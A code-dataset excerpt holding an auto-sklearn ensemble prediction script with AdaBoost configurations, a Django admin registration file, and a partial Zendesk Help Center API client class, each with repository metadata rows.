|
[
"BSD-2-Clause"
] | null | null | null |
import argparse
import os
import numpy as np
import autosklearn
import autosklearn.data
import autosklearn.data.data_manager
import autosklearn.models.evaluator
from ParamSklearn.classification import ParamSklearnClassifier
parser = argparse.ArgumentParser()
parser.add_argument('input')
parser.add_argument('output')
args = parser.parse_args()
input = args.input
dataset = 'philippine'
output = args.output
D = autosklearn.data.data_manager.DataManager(dataset, input)
X = D.data['X_train']
y = D.data['Y_train']
X_valid = D.data['X_valid']
X_test = D.data['X_test']
# Subset of features found with RFE. Feature with least importance in sklearn
# RF removed. Afterwards, trained RF on remaining features with 5CV. In the
# end, choose feature set with lowest error
features = [33, 89, 140, 168, 178, 271]
X = X[:, features]
X_valid = X_valid[:, features]
X_test = X_test[:, features]
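# A rough sketch of the RFE-style selection described above (not part of the original run,
# names purely illustrative): repeatedly drop the RandomForest feature with the lowest
# importance and keep the subset with the lowest 5-fold CV error, e.g.
#   from sklearn.ensemble import RandomForestClassifier
#   from sklearn.model_selection import cross_val_score
#   rf = RandomForestClassifier().fit(X, y)
#   worst = np.argmin(rf.feature_importances_)
#   score = cross_val_score(rf, np.delete(X, worst, axis=1), y, cv=5).mean()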
# Weights of the ensemble members as determined by Ensemble Selection
weights = np.array([0.100000, 0.080000, 0.080000, 0.060000, 0.040000,
0.040000, 0.040000, 0.040000, 0.040000, 0.040000,
0.040000, 0.020000, 0.020000, 0.020000, 0.020000,
0.020000, 0.020000, 0.020000, 0.020000, 0.020000,
0.020000, 0.020000, 0.020000, 0.020000, 0.020000,
0.020000, 0.020000, 0.020000, 0.020000, 0.020000,
0.020000])
# Ensemble members found by SMAC
configurations = [
{'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.243038132773',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '475.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '287.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'none',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.246430392425',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '436.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '156.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'standard',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.205679811363',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '485.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '79.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.250841964136',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '479.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '352.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'none',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.329040651125',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '493.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '268.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.376704790019',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '400.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'ward',
'feature_agglomeration:n_clusters': '344.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.483824181899',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '479.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '310.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.246430392425',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '494.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '156.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.319596208353',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '446.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '65.0',
'imputation:strategy': 'mean',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.208071429428',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '487.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '219.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'none',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.362379903949',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '389.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '123.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.468508930474',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '477.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '244.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.284273806405',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '483.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '174.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.2635286978',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '482.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '118.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.326966274076',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '494.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '87.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.239427049389',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '393.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '331.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.272345990341',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '478.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '20.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'standard',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.36300772469',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '430.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '88.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.29318612753',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '418.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '220.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'standard',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.315769388471',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '494.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '270.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.295544282435',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '478.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '195.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.298219714131',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '473.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '39.0',
'imputation:strategy': 'mean',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'standard',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.370877623224',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '382.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '331.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.339058617161',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '466.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '38.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'standard',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.272345990341',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '478.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '68.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'none',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.268568387674',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '499.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '78.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'standard',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.286357615604',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '490.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'ward',
'feature_agglomeration:n_clusters': '220.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.377112372612',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '458.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'ward',
'feature_agglomeration:n_clusters': '125.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.400954561452',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '408.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '345.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.196044249482',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '494.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '182.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.312315129765',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '442.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '347.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'none'}
]
classifiers = []
predictions_valid = []
predictions_test = []
# Make predictions and weight them
for weight, configuration in zip(weights, configurations):
for param in configuration:
try:
configuration[param] = int(configuration[param])
except Exception:
try:
configuration[param] = float(configuration[param])
except Exception:
pass
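# SMAC emits all hyperparameter values as strings; the casts above restore int/float
# types where possible before building each classifier.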
classifier = ParamSklearnClassifier(configuration, 1)
classifiers.append(classifier)
try:
classifier.fit(X.copy(), y.copy())
predictions_valid.append(
classifier.predict_proba(X_valid.copy()) * weight)
predictions_test.append(
classifier.predict_proba(X_test.copy()) * weight)
except Exception as e:
print(e)
print(configuration)
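# each predictions_* list now holds weight * class-probability arrays; summing them
# below gives the ensemble's weighted soft vote.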
# Output the predictions
for name, predictions in [('valid', predictions_valid),
('test', predictions_test)]:
predictions = np.array(predictions)
predictions = np.sum(predictions, axis=0)
predictions = predictions[:, 1].reshape((-1, 1))
filepath = os.path.join(output, '%s_%s_000.predict' % (dataset, name))
np.savetxt(filepath, predictions, delimiter=' ')
| 38.297872
| 77
| 0.611313
| 1,830
| 19,800
| 6.455191
| 0.125683
| 0.209938
| 0.057733
| 0.060357
| 0.832303
| 0.827394
| 0.827394
| 0.827394
| 0.748413
| 0.744519
| 0
| 0.063178
| 0.231768
| 19,800
| 517
| 78
| 38.297872
| 0.713431
| 0.017475
| 0
| 0.614141
| 0
| 0
| 0.558492
| 0.247082
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.00202
| 0.016162
| null | null | 0.00404
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6d5672c1f3d89f64d3d0b176f65a248b465de2cd
| 148
|
py
|
Python
|
APICore/admin.py
|
YWPS/API-Production
|
a4a40c45db4839c6ee0b92b169aeab8849a7ff16
|
[
"MIT"
] | null | null | null |
APICore/admin.py
|
YWPS/API-Production
|
a4a40c45db4839c6ee0b92b169aeab8849a7ff16
|
[
"MIT"
] | null | null | null |
APICore/admin.py
|
YWPS/API-Production
|
a4a40c45db4839c6ee0b92b169aeab8849a7ff16
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Image, Product, Item
# Register your models here.
admin.site.register([Image, Product, Item])
| 24.666667
| 43
| 0.777027
| 21
| 148
| 5.47619
| 0.619048
| 0.208696
| 0.278261
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128378
| 148
| 5
| 44
| 29.6
| 0.891473
| 0.175676
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
edd6854268e87066291a8ac59176b0a3129f4939
| 37,450
|
py
|
Python
|
jupyterbook_to_zendesk/zendeskhc/HelpCenter.py
|
dabble-of-devops-bioanalyze/jupyterbook_to_zendesk
|
69cc4707626097a65612823de9282e9728e714d8
|
[
"Apache-2.0"
] | null | null | null |
jupyterbook_to_zendesk/zendeskhc/HelpCenter.py
|
dabble-of-devops-bioanalyze/jupyterbook_to_zendesk
|
69cc4707626097a65612823de9282e9728e714d8
|
[
"Apache-2.0"
] | null | null | null |
jupyterbook_to_zendesk/zendeskhc/HelpCenter.py
|
dabble-of-devops-bioanalyze/jupyterbook_to_zendesk
|
69cc4707626097a65612823de9282e9728e714d8
|
[
"Apache-2.0"
] | null | null | null |
import json
import os
import sys
from pprint import pprint
import requests
from prettyprinter import cpprint
from jupyterbook_to_zendesk.logging import logger
from jupyterbook_to_zendesk.zendeskhc.ZendeskBase import *
class HelpCenter(Base):
def __init__(self, domain, email=None, password=None):
self.domain = domain
self.email = email
self.password = password
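# usage sketch (hypothetical domain and credentials):
#   hc = HelpCenter("https://example.zendesk.com", email="agent@example.com", password="api_token")
#   articles = hc.list_all_articles()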
def _page_gets(self, url, combine_key):
data = self.get(url, self.email, self.password)
if "error" in data.keys():
raise ZendeskError(data["error"])
next_page_url = data["next_page"]
while next_page_url is not None:
next_page_json = self.get(next_page_url, self.email, self.password)
data[combine_key] = data[combine_key] + next_page_json[combine_key]
next_page_url = next_page_json["next_page"]
data["next_page"] = None
return data
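# follows the "next_page" links returned by the Zendesk API and concatenates the
# paginated results under combine_key (e.g. "articles") into a single response dict.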
def _generate_options(self, options=None):
option_string = "?"
if not options:
options = {}
if "per_page" not in options.keys():
options["per_page"] = 100
for i in options.keys():
option_string = option_string + i
option_string = option_string + "="
option_string = option_string + str(options[i])
option_string = option_string + "&"
return option_string
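# e.g. _generate_options({"per_page": 30}) -> "?per_page=30&" (per_page defaults to 100 when omitted)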
# Article functions
def list_all_articles(self, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/help_center/articles.json" + option_string
return self._page_gets(url, "articles")
def list_articles_by_locale(self, locale, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/help_center/{locale}/articles.json" + option_string
url = url.format(locale=locale)
return self._page_gets(url, "articles")
def list_articles_by_category(self, category_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/categories/{id}/articles.json"
+ option_string
)
url = url.format(id=category_id)
return self._page_gets(url, "articles")
def list_articles_by_section(self, section_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/sections/{id}/articles.json"
+ option_string
)
url = url.format(id=section_id)
return self._page_gets(url, "articles")
def list_articles_by_user(self, user_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain + "/api/v2/help_center/users/{id}/articles.json" + option_string
)
url = url.format(id=user_id)
return self._page_gets(url, "articles")
def list_changed_articles(self, start_time, options=None):
# start_time should be a Unix epoch time
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/incremental/articles.json?start_time={start_time}"
+ option_string
)
url = url.format(start_time=start_time)
return self._page_gets(url, "articles")
def show_article(self, article_id, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/articles/{id}.json".format(
id=article_id
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/articles/{id}.json".format(
id=article_id, locale=locale
)
)
return self.get(url, self.email, self.password)
def create_article(self, section_id, data, locale=None):
if not locale:
url = self.domain + f"/api/v2/help_center/sections/{section_id}/articles"
else:
url = (
self.domain
+ f"/api/v2/help_center/{locale}/sections/{section_id}/articles"
)
return self.post(url, data, self.email, self.password)
def update_article_metadata(self, article_id, data, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/articles/{id}.json".format(
id=article_id
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/articles/{id}.json".format(
id=article_id, locale=locale
)
)
return self.put(url, data, self.email, self.password)
def archive_article(self, article_id, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/articles/{id}.json".format(
id=article_id
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/articles/{id}.json".format(
id=article_id, locale=locale
)
)
return self.delete(url, self.email, self.password)
# Translation functions
def list_article_translations(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/translations.json"
+ option_string
)
url = url.format(article_id=article_id)
return self._page_gets(url, "translations")
def list_section_translations(self, section_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/translations.json"
+ option_string
)
url = url.format(section_id=section_id)
return self._page_gets(url, "translations")
def list_category_translations(self, category_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/categories/{category_id}/translations.json"
+ option_string
)
url = url.format(category_id=category_id)
return self._page_gets(url, "translations")
def list_missing_article_translations(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/translations/missing.json"
+ option_string
)
url = url.format(article_id=article_id)
return self.get(url, self.email, self.password)
def list_missing_section_translations(self, section_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/translations/missing.json"
+ option_string
)
url = url.format(section_id=section_id)
return self.get(url, self.email, self.password)
def list_missing_category_translations(self, category_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/categories/{category_id}/translations/missing.json"
+ option_string
)
url = url.format(category_id=category_id)
return self.get(url, self.email, self.password)
def show_translation(self, article_id, locale):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/translations/{locale}.json".format(
article_id=article_id, locale=locale
)
)
return self.get(url, self.email, self.password)
def create_article_translation(self, article_id, data):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/translations.json".format(
article_id=article_id
)
)
return self.post(url, data, self.email, self.password)
def create_section_translation(self, section_id, data):
url = (
self.domain
+ "/api/v2/help_center/section/{section_id}/translations.json".format(
section_id=section_id
)
)
return self.post(url, data, self.email, self.password)
def create_category_translation(self, category_id, data):
url = (
self.domain
+ "/api/v2/help_center/categories/{category_id}/translations.json".format(
category_id=category_id
)
)
return self.post(url, data, self.email, self.password)
def update_article_translation(self, article_id, data, locale):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/translations/{locale}.json".format(
article_id=article_id, locale=locale
)
)
return self.put(url, data, self.email, self.password)
def update_section_translation(self, section_id, data, locale):
url = (
self.domain
+ "/api/v2/help_center/section/{section_id}/translations/{locale}.json".format(
section_id=section_id, locale=locale
)
)
return self.put(url, data, self.email, self.password)
def update_category_translation(self, category_id, data, locale):
url = (
self.domain
+ "/api/v2/help_center/categories/{category_id}/translations/{locale}.json".format(
category_id=category_id, locale=locale
)
)
return self.put(url, data, self.email, self.password)
def delete_translation(self, translation_id):
url = self.domain + "/api/v2/help_center/translations/{id}.json".format(
id=translation_id
)
return self.delete(url, self.email, self.password)
def list_enabled_and_default_locales(self):
url = self.domain + "/api/v2/help_center/locales.json"
return self.get(url, self.email, self.password)
# Section functions
def list_all_sections(self, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/help_center/sections.json" + option_string
return self._page_gets(url, "sections")
def list_sections_by_locale(self, locale, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/help_center/{locale}/sections.json" + option_string
url = url.format(locale=locale)
return self._page_gets(url, "sections")
def list_sections_by_category(self, category_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/categories/{category_id}/sections.json"
+ option_string
)
url = url.format(category_id=category_id)
return self._page_gets(url, "sections")
def show_section(self, section_id, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/sections/{id}.json".format(
id=section_id
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/sections/{id}.json".format(
locale=locale, id=section_id
)
)
return self.get(url, self.email, self.password)
def create_section(self, category_id, data, locale=None):
if not locale:
url = (
self.domain
+ "/api/v2/help_center/categories/{id}/sections.json".format(
id=category_id
)
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/categories/{id}/sections".format(
locale=locale, id=category_id
)
)
return self.post(url, data, self.email, self.password)
def update_section(self, section_id, data, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/sections/{id}.json".format(
id=section_id
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/sections/{id}.json".format(
locale=locale, id=section_id
)
)
return self.put(url, data, self.email, self.password)
def update_section_source_locale(self, section_id, data):
url = (
self.domain
+ "/api/v2/help_center/sections/{id}/source_locale.json".format(
id=section_id
)
)
return self.put(url, data, self.email, self.password)
def delete_section(self, section_id):
url = self.domain + "/api/v2/help_center/sections/{id}.json".format(
id=section_id
)
return self.delete(url, self.email, self.password)
# Category functions
def list_all_categories(self, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/help_center/categories.json" + option_string
return self._page_gets(url, "categories")
def list_categories_by_locale(self, locale, options=None):
option_string = self._generate_options(options)
url = (
self.domain + "/api/v2/help_center/{locale}/categories.json" + option_string
)
url = url.format(locale=locale)
return self._page_gets(url, "categories")
def show_category(self, category_id, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/categories/{id}.json".format(
id=category_id
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/categories/{id}.json".format(
locale=locale, id=category_id
)
)
return self.get(url, self.email, self.password)
def create_category(self, data, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/categories.json"
else:
url = self.domain + "/api/v2/help_center/{locale}/categories.json".format(
locale=locale
)
return self.post(url, data, self.email, self.password)
def update_category(self, category_id, data, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/categories/{id}.json".format(
id=category_id
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/categories/{id}.json".format(
locale=locale, id=category_id
)
)
return self.put(url, data, self.email, self.password)
def update_category_source_locale(self, category_id, data):
url = (
self.domain
+ "/api/v2/help_center/categories/{id}/source_locale.json".format(
id=category_id
)
)
return self.put(url, data, self.email, self.password)
def delete_category(self, category_id):
url = self.domain + "/api/v2/help_center/categories/{id}.json".format(
id=category_id
)
return self.delete(url, self.email, self.password)
# Comment Functions
def list_comments_by_user(self, user_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain + "/api/v2/help_center/users/{id}/comments.json" + option_string
)
url = url.format(id=user_id)
return self._page_gets(url, "comments")
def list_comments_by_article(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{id}/comments.json"
+ option_string
)
url = url.format(id=article_id)
return self._page_gets(url, "comments")
def show_comment(self, article_id, user_id):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/comments/{id}.json".format(
article_id=article_id, id=user_id
)
)
return self.get(url, self.email, self.password)
def create_comment(self, article_id, data):
url = self.domain + "/api/v2/help_center/articles/{id}/comments.json".format(
id=article_id
)
return self.post(url, data, self.email, self.password)
def update_comment(self, article_id, comment_id, data):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/comments/{id}.json".format(
article_id=article_id, id=comment_id
)
)
